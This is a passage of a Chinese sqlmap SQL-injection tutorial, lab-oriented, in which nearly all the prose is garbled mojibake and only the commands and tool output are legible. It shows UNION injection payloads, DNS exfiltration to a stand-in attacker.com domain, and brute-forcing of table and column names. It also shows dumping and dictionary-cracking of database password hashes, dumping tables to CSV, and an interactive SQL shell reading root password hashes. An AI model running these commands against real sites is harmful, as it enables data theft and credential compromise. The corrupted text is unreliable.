[10:59:15] [PAYLOAD] 001 UNION ALL SELECT NULL,CONCAT(0x71707a6271,0x66546c7770497458576f6455476761654654745744684c5062585971794c556d55454a6c49525675,0x7162767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- FAcV
[10:59:15] [PAYLOAD] 001 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a6271,0x6b43674e76687959526b6452627255787373675a6f5a436f7266756d49424547496d506779456170,0x7162767671),NULL,NULL,NULL,NULL,NULL-- caXD
python sqlmap.py -u "http://192.168.56.101/user.php?id=001" --technique U -v 3 --union-char 123
[10:59:30] [PAYLOAD] 001 UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123,123,CONCAT(0x716b707171,0x776c71686e54726659424b49616d68756e64734d45774c4c7163494345794255784557597a484244,0x7178627071)-- aUXO
[10:59:30] [PAYLOAD] 001 UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123,CONCAT(0x716b707171,0x6f5278444767675156496c724563714e6568634c6b5950646a6f4e53516b776d77474e7141425273,0x7178627071),123-- lPHb
浠旂粏瑙傚療涓婄ず涓や緥鐨勮緭鍑哄氨鑳芥槑鐧解€滆仈鍚堟煡璇㈡敞鍏ヤ腑浣跨敤鐨勫瓧绗︹€濆氨鏄€淯NION ALL SELECT XXX, XXX鈥濅腑鐨勨€淴XX鈥濄€?
5.鑱斿悎鏌ヨ娉ㄥ叆涓〃鍚嶈缃?
鍙傛暟锛氣€搖nion-from
鏈変簺鎯呭喌涓嬪湪鑱斿悎鏌ヨ涓繀椤绘寚瀹氫竴涓湁鏁堝拰鍙闂殑琛ㄥ悕锛屽惁鍒欒仈鍚堟煡璇細鎵ц澶辫触锛屽鍦ㄥ井杞殑Access涓€? 锛堜篃灏辨槸璇达紝鏌愪簺DBMS涓嶆敮鎸佲€淪ELECT 1,2;鈥濊繖鏍风殑璇彞锛孲ELECT蹇呴』鏈塅ROM銆傦級
鐢ㄦ鍙傛暟鎸囧畾杩欎釜琛ㄥ悕锛屽锛氣€溾€搖nion-from=users鈥濄€?
6.DNS娉勯湶鏀诲嚮
鍙傛暟锛氣€揹ns-domain
SQL娉ㄥ叆涓殑DNS娉勯湶鏀诲嚮璇︽儏瑙佽鏂囥€奃ata Retrieval over DNS in SQL Injection Attacks銆嬨€?
鍋囪鏀诲嚮鑰呮帶鍒剁潃鏌愬煙鍚嶏紙渚嬪锛歛ttacker.com锛夌殑鍩熷悕瑙f瀽鏈嶅姟鍣紝鍗虫煡璇㈣鍩熷悕鐨勫瓙鍩熷悕瀵瑰簲鐨処P鍦板潃閮戒細鍒拌繖鍙板煙鍚嶈В鏋愭湇鍔″櫒鏉ユ煡璇€? 杩欐椂鏀诲嚮鑰呭氨鍙互浣跨敤鈥溾€揹ns-domain attacker.com鈥濇潵杩涜DNS娉勯湶鏀诲嚮銆?
瀹為檯涓婅嫢鏄敾鍑昏€呮病鏈夋帶鍒朵换浣曚竴鍙板煙鍚嶈В鏋愭湇鍔″櫒锛岄偅涔堝ス鍙互娉ㄥ唽涓€涓柊鍩熷悕锛屽啀鑷繁鎼缓涓€鍙板煙鍚嶈В鏋愭湇鍔″櫒鐢ㄤ簬鎺ュ彈鏁版嵁銆?
7.浜岄樁娉ㄥ叆鏀诲嚮
鍙傛暟锛氣€搒econd-order
鏈夋椂娉ㄥ叆缁撴灉鏄剧ず鍦ㄥ埆鐨勯〉闈紝姝ゆ椂闇€瑕佺敤姝ゅ弬鏁版寚鏄庢樉绀烘敞鍏ョ粨鏋滅殑椤甸潰锛岃鍙傛暟鍚庤窡涓€涓猆RL銆?
鍗併€佹寚绾?/h3>
榛樿鍦癝qlmap浼氳嚜鍔ㄥ娉ㄥ叆鐩爣杩涜鏁版嵁搴撶鐞嗙郴缁熸寚绾硅瘑鍒€?
鍙傛暟锛?f鎴栤€揻ingerprint
鑻ユ兂鎵ц鏇村箍娉涚殑鏁版嵁搴撶鐞嗙郴缁熸寚绾硅瘑鍒彲浠ユ坊鍔犳鍙傛暟銆?
鍙傛暟锛?b鎴栤€揵anner
鑻ユ兂寰楀埌鏇寸簿纭殑鎸囩汗璇嗗埆缁撴灉鍙互娣诲姞姝ゅ弬鏁帮紝璇︽儏瑙佸悗鏂囥€?
鍗佷竴銆佹毚鍔涚牬瑙?/h3>
1.鏆村姏鐮磋В琛ㄥ悕
鍙傛暟锛氣€揷ommon-tables
鏈変簺鎯呭喌涓嬬敤鈥溾€搕ables鈥濅笉鑳藉垪鍑烘暟鎹簱涓〃鍚嶆潵锛屽锛?
- 鐗堟湰灏忎簬5.0鐨凪ySQL娌℃湁information_schema琛?/li>
- 寰蒋Access鐨凪SysObjects琛ㄩ粯璁や笉鍙
- 鏁版嵁搴撶敤鎴锋潈闄愯繃浣庢棤娉曡鍙栬〃鍚?/li>
褰撴棤娉曡鍑鸿〃鍚嶆椂鍙互浣跨敤鍙傛暟鈥溾€揷ommon-tables鈥濇毚鍔涚牬瑙h〃鍚嶏紝
璇ュ弬鏁颁娇鐢ㄧ殑瀛楀吀鏄痶xt/common-tables.txt锛屽叾涓瓨鍌ㄤ簡甯歌琛ㄥ悕锛屽彲浠ユ墜鍔ㄧ紪杈戣鏂囦欢銆?
2.鏆村姏鐮磋В鍒楀悕
鍙傛暟锛氣€揷ommon-columns
鏈変簺鎯呭喌涓嬬敤鈥溾€揷olumns鈥濅笉鑳藉垪鍑烘暟鎹〃涓垪鍚嶆潵锛屽锛?
- 鐗堟湰灏忎簬5.0鐨凪ySQL娌℃湁information_schema琛?/li>
- 寰蒋Access鐨凪SysObjects琛ㄩ粯璁や笉鍙
- 鏁版嵁搴撶敤鎴锋潈闄愯繃浣庢棤娉曡鍙栧垪鍚?/li>
褰撴棤娉曡鍑哄垪鍚嶆椂鍙互浣跨敤鍙傛暟鈥溾€揷ommon-columns鈥濇毚鍔涚牬瑙e垪鍚嶏紝
璇ュ弬鏁颁娇鐢ㄧ殑瀛楀吀鏄痶xt/common-columns.txt锛屽叾涓瓨鍌ㄤ簡甯歌鍒楀悕锛屽彲浠ユ墜鍔ㄧ紪杈戣鏂囦欢銆?
鍗佷簩銆佸垪涓炬暟鎹?/h3>
杩欎簺鍙傛暟鐢ㄤ簬鍒椾妇鍑烘暟鎹簱绠$悊绯荤粺淇℃伅銆佹暟鎹粨鏋勫拰鏁版嵁鍐呭銆?
1.涓€閿垪涓惧叏閮ㄦ暟鎹?
鍙傛暟锛氣€揳ll
浣跨敤杩欎竴涓弬鏁板氨鑳藉垪涓炬墍鏈夊彲璁块棶鐨勬暟鎹€備絾涓嶆帹鑽愪娇鐢紝鍥犱负杩欎細鍙戦€佸ぇ閲忚姹傦紝鎶婃湁鐢ㄥ拰鏃犵敤鐨勪俊鎭兘鍒椾妇鍑烘潵銆?
2.鍒椾妇鏁版嵁搴撶鐞嗙郴缁熶俊鎭?
鍙傛暟锛?b鎴栤€揵anner
澶у鏁扮殑鐜颁唬鏁版嵁搴撶鐞嗙郴缁熼兘鏈変竴涓嚱鏁版垨鏄幆澧冨彉閲忚兘澶熻繑鍥炴暟鎹簱绠$悊绯荤粺鐨勭増鏈彿鍜屾渶鍚庣殑琛ヤ竵绾у埆浠ュ強搴曞眰鐨勬搷浣滅郴缁熶俊鎭€? 閫氬父杩欎釜鍑芥暟鏄痸ersion()銆佺幆澧冨彉閲忔槸@@version锛屽綋鐒惰鐪嬬洰鏍囨暟鎹簱绠$悊绯荤粺浜嗐€備娇鐢ㄥ弬鏁扳€?b鈥濇垨鈥溾€揵anner鈥濇潵鍒椾妇鏁版嵁搴撶鐞嗙郴缁熺殑杩欎竴淇℃伅銆?
涓嬩緥涓殑鏁版嵁搴撴槸Oracle锛?
python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" --banner
[09:54:30] [INFO] fetching banner
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --banner
[09:56:32] [INFO] fetching banner
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0
banner: '5.5.50-0ubuntu0.14.04.1'
3.鍒椾妇褰撳墠鐢ㄦ埛
鍙傛暟锛氣€揷urrent-user
浣跨敤杩欎竴鍙傛暟鏈夊彲鑳藉皢鎵цSQL璇彞鐨勭敤鎴峰垪涓惧嚭鏉ャ€?
4.鍒椾妇褰撳墠鏁版嵁搴?
鍙傛暟锛氣€揷urrent-db
浣跨敤杩欎竴鍙傛暟鏈夊彲鑳藉皢WEB搴旂敤杩炴帴鐨勬暟鎹簱鍚嶅垪涓惧嚭鏉ャ€?
5.鍒椾妇鏈嶅姟鍣ㄤ富鏈哄悕
鍙傛暟锛氣€揾ostname
浣跨敤杩欎竴鍙傛暟鏈夊彲鑳藉皢鏁版嵁搴撶鐞嗙郴缁熸墍鍦ㄨ绠楁満鐨勪富鏈哄悕鍒椾妇鍑烘潵锛屽锛?
python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --\
hostname
閮ㄥ垎杈撳嚭濡備笅锛?
[xx:xx:04] [INFO] fetching server hostname
[xx:xx:04] [INFO] retrieved: debian-5.0-i386
hostname: 'debian-5.0-i386'
6.妫€娴嬪綋鍓嶇敤鎴锋槸鍚︽槸绠$悊鍛?
鍙傛暟锛氣€搃s-dba
浣跨敤杩欎竴鍙傛暟鏈夊彲鑳借兘澶熸娴嬪綋鍓嶇敤鎴锋槸鍚︽槸绠$悊鍛橈紝鑻ユ槸绠$悊鍛樺垯杩斿洖True锛屽惁鍒欒繑鍥濬alse銆傚锛?
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --is-dba
[10:05:16] [INFO] testing if current user is DBA
[10:05:16] [INFO] fetching current user
[10:05:16] [WARNING] reflective value(s) found and filtering out
current user is DBA: True
7.鍒椾妇鏁版嵁搴撶鐞嗙郴缁熶腑鐨勭敤鎴?
鍙傛暟锛氣€搖sers
褰撳墠鐢ㄦ埛鏈夎鍙栧寘鍚簡鏁版嵁搴撶鐞嗙郴缁熶腑鐢ㄦ埛淇℃伅鐨勭郴缁熻〃鐨勬潈闄愭椂浣跨敤杩欎竴鍙傛暟鍙互鍒椾妇鏁版嵁搴撶鐞嗙郴缁熶腑鐨勭敤鎴枫€?
8.鍒椾妇骞剁牬瑙f暟鎹簱绠$悊绯荤粺鐢ㄦ埛瀵嗙爜Hash鍊?
鍙傛暟锛氣€損asswords
褰撳墠鐢ㄦ埛鏈夎鍙栧寘鍚簡鏁版嵁搴撶鐞嗙郴缁熶腑鐢ㄦ埛瀵嗙爜Hash鍊肩殑绯荤粺琛ㄧ殑鏉冮檺鏃朵娇鐢ㄨ繖涓€鍙傛暟鍙互鍒椾妇鏁版嵁搴撶鐞嗙郴缁熶腑鐢ㄦ埛瀵嗙爜Hash鍊笺€? Sqlmap浼氬厛鍒椾妇鐢ㄦ埛锛屽啀鍒椾妇鐢ㄦ埛瀵嗙爜Hash鍊笺€?
涓嬮潰鏄竴涓互PostgreSQL涓虹洰鏍囩殑渚嬪瓙锛?
python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1
back-end DBMS: PostgreSQL
[hh:mm:38] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt]
[hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
database management system users password hashes:
[*] postgres [1]:
password hash: md5d7d880f96044b72d0bba108ace96d1e4
clear-text password: testpass
[*] testuser [1]:
password hash: md599e5ea7a6f7c3269995cba3927fd0093
clear-text password: testpass
Sqlmap涓嶄粎浼氬垪涓惧嚭瀵嗙爜Hash锛岃繕浼氳В鏋愬瘑鐮丠ash鏍煎紡锛屽苟璇㈤棶鐢ㄦ埛鏄惁瑕侀€氳繃瀵嗙爜瀛楀吀鐨勬柟寮忕牬瑙ash鍊煎鎵惧嚭鏄庢枃瀵嗙爜銆?
鑻ユ兂鍙灇涓剧壒瀹氱敤鎴风殑瀵嗙爜浣跨敤鍙傛暟鈥?U鈥濇寚瀹氱敤鎴凤紝鍙敤鈥淐U鈥濇潵浠h〃褰撳墠鐢ㄦ埛锛屽锛?
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --password -U CU
database management system users password hashes:
[*] root [1]:
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
clear-text password: root
9.鍒椾妇鏁版嵁搴撶鐞嗙郴缁熺殑鐢ㄦ埛鏉冮檺
鍙傛暟锛氣€損rivileges
褰撳墠鐢ㄦ埛鏈夎鍙栧寘鍚簡鏁版嵁搴撶鐞嗙郴缁熶腑鐢ㄦ埛淇℃伅鐨勭郴缁熻〃鐨勬潈闄愭椂浣跨敤杩欎竴鍙傛暟鍙互鍒椾妇鏁版嵁搴撶鐞嗙郴缁熶腑鐢ㄦ埛鐨勬潈闄愩€傞€氳繃鐢ㄦ埛鏉冮檺鍙互鍒ゆ柇鍝簺鐢ㄦ埛鏄鐞嗗憳銆?
鑻ユ兂鍙灇涓剧壒瀹氱敤鎴风殑鏉冮檺浣跨敤鍙傛暟鈥?U鈥濇寚瀹氱敤鎴凤紝鍙敤鈥淐U鈥濇潵浠h〃褰撳墠鐢ㄦ埛銆?
鑻ョ洰鏍囨槸寰蒋鐨凷QL Server锛岃繖涓€鍙傛暟浼氬垪鍑烘瘡涓敤鎴锋槸鍚︽槸绠$悊鍛樿€屼笉鍒楀嚭姣忎釜鐢ㄦ埛鐨勫叿浣撴潈闄愩€?
10.鍒椾妇鏁版嵁搴撶鐞嗙郴缁熺殑鐢ㄦ埛瑙掕壊
鍙傛暟锛氣€搑oles
褰撳墠鐢ㄦ埛鏈夎鍙栧寘鍚簡鏁版嵁搴撶鐞嗙郴缁熶腑鐢ㄦ埛淇℃伅鐨勭郴缁熻〃鐨勬潈闄愭椂浣跨敤杩欎竴鍙傛暟鍙互鍒椾妇鏁版嵁搴撶鐞嗙郴缁熶腑鐢ㄦ埛鐨勮鑹层€?
鑻ユ兂鍙灇涓剧壒瀹氱敤鎴风殑瑙掕壊浣跨敤鍙傛暟鈥?U鈥濇寚瀹氱敤鎴凤紝鍙敤鈥淐U鈥濇潵浠h〃褰撳墠鐢ㄦ埛銆?
瀹樻柟鎵嬪唽涓婅鍙湁鐩爣鏁版嵁搴撶鐞嗙郴缁熸槸Oracle鏃惰繖涓€鍔熻兘鎵嶅彲鐢紝浣嗘垜鍦∕ysql涓祴璇曚篃鏄彲鐢ㄧ殑銆?
11.鍒椾妇鏁版嵁搴撶鐞嗙郴缁熶腑鐨勬墍鏈夋暟鎹簱
鍙傛暟锛氣€揹bs
褰撳墠鐢ㄦ埛鏈夎鍙栧寘鍚簡鏁版嵁搴撶鐞嗙郴缁熶腑鍙敤鏁版嵁搴撲俊鎭殑绯荤粺琛ㄧ殑鏉冮檺鏃朵娇鐢ㄨ繖涓€鍙傛暟鍙互鍒椾妇鏁版嵁搴撶鐞嗙郴缁熶腑鎵€鏈夋暟鎹簱銆?
12.鍒椾妇鏁版嵁搴撴暟鎹簱鐨勬墍鏈夎〃
鍙傛暟锛氣€搕ables銆佲€揺xclude-sysdbs鍜?D
褰撳墠鐢ㄦ埛鏈夎鍙栧寘鍚簡鏁版嵁搴撶鐞嗙郴缁熶腑鍙敤鏁版嵁搴撲腑鏁版嵁琛ㄤ俊鎭殑绯荤粺琛ㄧ殑鏉冮檺鏃朵娇鐢ㄥ弬鏁扳€溾€搕ables鈥濆彲浠ュ垪涓剧敤鍙傛暟鈥?D鈥濇寚瀹氱殑鏁版嵁搴撲腑鐨勬墍鏈夋暟鎹〃銆? 鑻ユ病鏈夌敤鍙傛暟鈥?D鈥濇寚瀹氭暟鎹簱锛屽彧浣跨敤鍙傛暟鈥溾€搕ables鈥濅細鍒椾妇鎵€鏈夋暟鎹簱涓墍鏈夎〃銆傚锛?
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" -D DBName --tables
浣跨敤鍙傛暟鈥溾€揺xclude-sysdbs鈥濆彲鎺掗櫎绯荤粺鏁版嵁搴撱€傚湪Oracle涓鎸囧畾TABLESPACE_NAME鑰屼笉鏄暟鎹簱鍚嶃€?
13.鍒椾妇鏁版嵁琛ㄧ殑鎵€鏈夊垪
鍙傛暟锛氣€揷olumns銆?C銆?T鍜?D
濡傛潈闄愬厑璁革紝浣跨敤鍙傛暟鈥溾€揷olumns鈥濆彲浠ュ垪鍑虹敤鈥?D鈥濇寚瀹氱殑鏁版嵁搴撲腑鐢ㄢ€?T鈥濇寚瀹氱殑琛ㄤ腑鐨勬墍鏈夊垪鐨勫悕瀛楀拰鏁版嵁绫诲瀷銆?
鑻ユ病鏈夋寚瀹氭暟鎹簱鍒欎細榛樿浣跨敤褰撳墠鏁版嵁搴撱€傝繕鍙互鐢ㄢ€?C鈥濇寚瀹氭劅鍏磋叮鐨勬煇鍑犲垪杩欐牱灏变笉鐢ㄥ垪鍑烘墍鏈夊垪鏉ャ€?
涓嬮潰鏄互SQLite涓虹洰鏍囩殑渚嬪瓙锛?
python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users
Database: SQLite_masterdb
Table: users
[3 columns]
+---------+---------+
| Column | Type |
+---------+---------+
| id | INTEGER |
| name | TEXT |
| surname | TEXT |
+---------+---------+
鍗佷笁銆佸垪涓炬暟鎹簱绠$悊绯荤粺鐨勬ā寮?/h3>
鍙傛暟锛氣€搒chema鍜屸€揺xclude-sysdbs
鐢ㄦ埛鍙敤姝ら€夐」鍒椾妇鏁版嵁搴撶鐞嗙郴缁熺殑妯″紡銆傛ā寮忓垪琛ㄥ寘鍚墍鏈夋暟鎹簱銆佽〃銆佸垪銆佽Е鍙戝櫒鍜屼粬浠悇鑷殑绫诲瀷銆? 鍚屾牱鍦帮紝鍙娇鐢ㄥ弬鏁扳€溾€揺xclude-sysdbs鈥濇帓闄ょ郴缁熸暟鎹簱銆?
涓嬮潰鏄殑渚嬪瓙娴嬭瘯瀵硅薄鏄疢ysql:
閮ㄥ垎杈撳嚭濡備笅锛?
[...]
Database: mysql
Table: procs_priv
[8 columns]
+--------------+----------------------------------------+
| Column | Type |
+--------------+----------------------------------------+
| Timestamp | timestamp |
| User | char(16) |
| Db | char(64) |
| Grantor | char(77) |
| Host | char(60) |
| Proc_priv | set('Execute','Alter Routine','Grant') |
| Routine_name | char(64) |
| Routine_type | enum('FUNCTION','PROCEDURE') |
+--------------+----------------------------------------+
[...]
Database: mysql
Table: ndb_binlog_index
[7 columns]
+-----------+---------------------+
| Column | Type |
+-----------+---------------------+
| Position | bigint(20) unsigned |
| deletes | bigint(20) unsigned |
| epoch | bigint(20) unsigned |
| File | varchar(255) |
| inserts | bigint(20) unsigned |
| schemaops | bigint(20) unsigned |
| updates | bigint(20) unsigned |
+-----------+---------------------+
15.鍒椾妇琛ㄤ腑鏁版嵁鏉℃暟
鍙傛暟锛氣€揷ount
鏈夋椂鎴戜滑鍙兂鐭ラ亾鏈夊灏戞暟鎹€屼笉鎯崇煡閬撳叿浣撶殑鏁版嵁鍐呭锛屾鏃跺氨鍙互浣跨敤璇ュ弬鏁般€傚锛?
python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb
Database: testdb
+----------------+---------+
| Table | Entries |
+----------------+---------+
| dbo.users | 4 |
| dbo.users_blob | 2 |
+----------------+---------+
16.鍒椾妇琛ㄤ腑鏁版嵁
鍙傛暟锛氣€揹ump銆?C銆?T銆?D銆佲€搒tart銆佲€搒top鍜屸€搘here
鏉冮檺鍏佽鏃跺彲浠ュ垪涓捐〃涓暟鎹€傜敤鍙傛暟鈥?D鈥濇寚瀹氭暟鎹簱锛岀敤鍙傛暟鈥?T鈥濇寚瀹氭暟鎹〃锛岀敤鍙傛暟鈥?C鈥濇寚瀹氱洰鏍囧垪銆? 鑻ュ彧鎸囧畾浜嗘暟鎹〃鑰屾病鏈夋寚瀹氭暟鎹簱鍒欓粯璁や娇鐢ㄥ綋鍓嶆暟鎹簱銆傝嫢娌℃湁鎸囧畾鍒楀垯鍒椾妇琛ㄤ腑鍏ㄩ儴鍒椼€?
涓嬩緥鏄互Firebird涓虹洰鏍囷細
python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME | SURNAME |
+----+--------+------------+
| 1 | luther | blisset |
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 4 | NULL | nameisnull |
+---+--------+-------------+
鍙娇鐢ㄥ弬鏁扳€溾€揹ump鈥濆拰鈥?D鈥濆彲浠ヤ竴娆℃€у垪涓炬暣涓暟鎹簱涓墍鏈夋暟鎹€?
Sqlmap浼氳嚜鍔ㄥ皢鍙傛暟鈥溾€揹ump鈥濆垪涓剧殑鏁版嵁淇濆瓨鍒癈SV鏍煎紡鏂囦欢涓紝鏂囦欢鍏蜂綋璺緞浼氬湪Sqlmap鐨勮緭鍑轰腑缁欏嚭锛屽锛?
python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" -D DSSchool --dump
[11:15:27] [INFO] analyzing table dump for possible password hashes
Database: DSSchool
Table: T_SCORESYSTEMTEACHERS
[2 entries]
+-----+----------+-------+---------+----------+
| AGE | NAME | TITLE | ACCOUNT | PASSWORD |
+-----+----------+-------+---------+----------+
| 21 | neo | ?? | 001 | 001 |
| 31 | morphine | ?? | 002 | 002 |
+-----+----------+-------+---------+----------+
[11:15:27] [INFO] table 'DSSchool.T_SCORESYSTEMTEACHERS' dumped to CSV file '/home/werner/.sqlmap/output/192.168.56.102/dump/DSSchool/T_SCORESYSTEMTEACHERS.csv'
鎴彇鐨勮緭鍑轰腑鏈€鍚庝竴琛屼究鏄疌SV鏂囦欢淇濆瓨鐨勮矾寰勩€?
鑻ュ彧鎯冲垪涓鹃儴鍒嗘暟鎹彲浠ヤ娇鐢ㄥ弬鏁扳€溾€搒tart鈥濆拰鈥溾€搒top鈥濄€傚鍙兂鍒椾妇绗竴鏉℃暟鎹彲浠ユ坊鍔犫€溾€搒top 1鈥濓紝
鍙兂鍒椾妇绗簩鍜岀涓夋潯鏁版嵁鍙互娣诲姞鈥溾€搒tart 1 鈥搒top 3鈥濓紝鍙杩欐槸涓€涓乏寮€鍙抽棴鍖洪棿銆? 鍖洪棿鑼冨洿浠呭湪鐩叉敞涓湁鏁堬紝鍥犱负鍦ㄥ熀浜庨敊璇俊鎭殑娉ㄥ叆鍜岃仈鍚堟煡璇㈡敞鍏ヤ腑鍖洪棿鑼冨洿浼氳蹇界暐銆?
闄や簡鐢ㄥ尯闂磋寖鍥撮檺鍒跺垪涓剧殑鏁版嵁澶栵紝杩樺彲浠ョ敤鈥溾€搘here鈥濆弬鏁版潵闄愬埗鍒椾妇鐨勬暟鎹€? 鈥溾€搘here鈥濆弬鏁颁細琚玈qlmap杞崲鎴怶HERE瀛愬彞锛屽鈥溾€搘here id>3鈥濅細鍙垪涓惧垪id鐨勫€煎ぇ浜?鐨勬暟鎹€?
濡備綘鎵€瑙侊紝Sqlmap鍗佸垎鐏垫椿銆傚彲浠ュ洬鍥靛湴鍒椾妇鏁翠釜鏁版嵁搴擄紝涔熷彲浠ョ粏鑷村湴鍦ㄨ〃涓€夋嫨鍒楋紝鍦ㄥ垪涓張閫夋嫨鐗瑰畾鏁版嵁銆?
17.鍒椾妇鎵€鏈夋暟鎹簱鎵€鏈夎〃涓墍鏈夋暟鎹?
鍙傛暟锛氣€揹ump-all鍜屸€揺xclude-sysdbs
浣跨敤鍙傛暟鈥溾€揹ump-all鈥濆彲鍒椾妇鎵€鏈夋暟鎹簱鎵€鏈夎〃涓墍鏈夋暟鎹€傚悓鏍峰湴锛屽彲浣跨敤鍙傛暟鈥溾€揺xclude-sysdbs鈥濇帓闄ょ郴缁熸暟鎹簱銆?
娉ㄦ剰寰蒋SQL Server鐨刴aster鏁版嵁搴撲笉灞炰簬绯荤粺鏁版嵁搴擄紝鍥犱负鏈変簺绠$悊鍛樹細鍦ㄨ繖涓暟鎹簱涓瓨鍌ㄧ敤鎴锋暟鎹€?
18.鍦ㄦ暟鎹簱銆佽〃銆佸垪涓悳绱?
鍙傛暟锛氣€搒earch銆?C銆?T鍜?D
鍙互鎼滅储鏁版嵁搴撳悕锛屽湪鎵€鏈夋暟鎹簱涓悳绱㈣〃鍚嶏紝鍦ㄦ墍鏈夋暟鎹簱鐨勬墍鏈夎〃涓悳绱㈠垪鍚嶃€?
鍙傛暟鈥溾€搒earch鈥濊鍜屼笅鍒楀弬鏁颁箣涓€閰嶅悎浣跨敤锛?
- -C锛氬悗璺熶互閫楀彿鍒嗛殧鐨勫垪鍚嶏紝鍦ㄦ暣涓暟鎹簱绠$悊绯荤粺涓悳绱?/li>
- -T锛氬悗璺熶互閫楀彿鍒嗛殧鐨勮〃鍚嶏紝鍦ㄦ暣涓暟鎹簱绠$悊绯荤粺涓悳绱?/li>
- -D锛氬悗璺熶互閫楀彿鍒嗛殧鐨勫簱鍚嶏紝鍦ㄦ暣涓暟鎹簱绠$悊绯荤粺涓悳绱?/li>
鍦ㄦ悳绱㈡椂锛孲qlmap浼氳闂敤鎴疯繘琛岀簿纭悳绱㈣繕鏄寘鍚悳绱€? 榛樿涓哄寘鍚悳绱紝鍗虫悳绱㈢殑瀛楃涓插寘鍚簬缁撴灉涓氨璁や负鍛戒腑銆? 绮剧‘鎼滅储瑕佹眰鎼滅储鐨勫瓧绗︿覆涓庣粨鏋滃畬鍏ㄧ浉绛夈€?
19.杩愯鑷畾涔夌殑SQL璇彞
鍙傛暟锛氣€搒ql-query鍜屸€搒ql-shell
杩欎竴鍔熻兘鍏佽鎵ц浠绘剰鐨凷QL璇彞锛孲qlmap浼氳嚜鍔ㄨВ鏋愮粰鍑虹殑SQL璇彞锛岄€夋嫨鎭板綋鐨勬敞鍏ユ妧鏈苟灏嗙粰鍑虹殑SQL璇彞鎵撳寘鍒皃ayload涓€?
濡傛灉鏌ヨ鏄釜SELECT璇彞锛孲qlmap浼氳繑鍥炴煡璇㈢粨鏋溿€傚鏋淲eb搴旂敤浣跨敤鐨勬暟鎹簱绠$悊绯荤粺鏀寔澶氳鍙ユ煡璇紝Sqlmap浼氫娇鐢ㄥ爢娉ㄥ叆鎶€鏈€? 浣嗚娉ㄦ剰Web搴旂敤鍙兘涓嶆敮鎸佸爢鏌ヨ锛屼緥濡侾HP浣跨敤Mysql鏃朵笉鏀寔鍫嗘煡璇紝浣嗕娇鐢≒ostgreSQL鏃舵敮鎸佸爢鏌ヨ銆?
涓嬩緥鐨勭洰鏍囨槸SQL Server 2000锛?
python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1
[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
[hh:mm:14] [INFO] retrieved: foo
SELECT 'foo':
'foo'
python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo', 'bar'" -v 2
[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now
unpack it into distinct queries to be able to retrieve the output even if we are
going blind
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS
VARCHAR(8000)), (CHAR(32)))
[hh:mm:50] [INFO] retrieved: foo
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VA
RCHAR(8000)), (CHAR(32)))
[hh:mm:50] [INFO] retrieved: bar
[hh:mm:50] [DEBUG] performed 27 quer
濡備綘鎵€瑙侊紝Sqlmap灏嗘彁渚涚殑SQL璇彞鍒嗘垚浜嗕袱涓笉鍚岀殑SELECT璇彞锛屽苟鍒嗗埆杩斿洖缁撴灉銆?
鍙傛暟鈥溾€搒ql-shell鈥濇彁渚涗竴涓氦浜掑紡鐨凷QL璇彞鎵ц鐜锛屾敮鎸乀ab閿ˉ鍏ㄥ拰鍛戒护鍘嗗彶璁板綍銆傚锛?
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --sql-shell
[15:06:47] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select 'foo';
[15:07:41] [INFO] fetching SQL SELECT statement query output: 'select 'foo''
select 'foo';: 'foo'
sql-shell> select password from mysql.user where user='root';
[15:07:42] [INFO] fetching SQL SELECT statement query output: 'select password from mysql.user where user='root''
select password from mysql.user where user='root'; [1]:
[*] *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
sql-shell> show tables;
[15:11:15] [INFO] fetching SQL SELECT statement query output: 'show tables'
[15:11:15] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries)
show tables; [1]:
鍗佸洓銆乁DF娉ㄥ叆
鍙傛暟锛氣€搖df-inject
